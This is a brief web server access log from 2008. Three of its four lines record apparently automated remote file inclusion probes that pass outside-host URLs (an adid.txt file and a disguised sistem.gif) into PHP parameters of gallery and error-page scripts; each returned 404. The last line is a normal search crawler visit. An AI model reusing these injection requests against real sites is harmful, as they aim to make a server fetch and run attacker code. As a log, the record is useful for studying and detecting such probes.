89.218.85.18 - - [08/Jun/2008:11:50:44 -0500] "GET /logs/access_log.1204156800//modules/My_eGallery/public/displayCategory.php?basepath=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 358 "-""libwww-perl/5.805"
84.246.21.79 - - [08/Jun/2008:11:51:55 -0500] "GET /logs//errors.php?error=http://www.lars-geiger.de/ok/components/com_extcalendar/images/minipics/sistem.gif?? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
84.246.21.79 - - [08/Jun/2008:11:51:55 -0500] "GET //errors.php?error=http://www.lars-geiger.de/ok/components/com_extcalendar/images/minipics/sistem.gif?? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
74.6.22.166 - - [08/Jun/2008:11:54:55 -0500] "GET /tattoo/tattoo1.htm HTTP/1.0" 200 3776 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
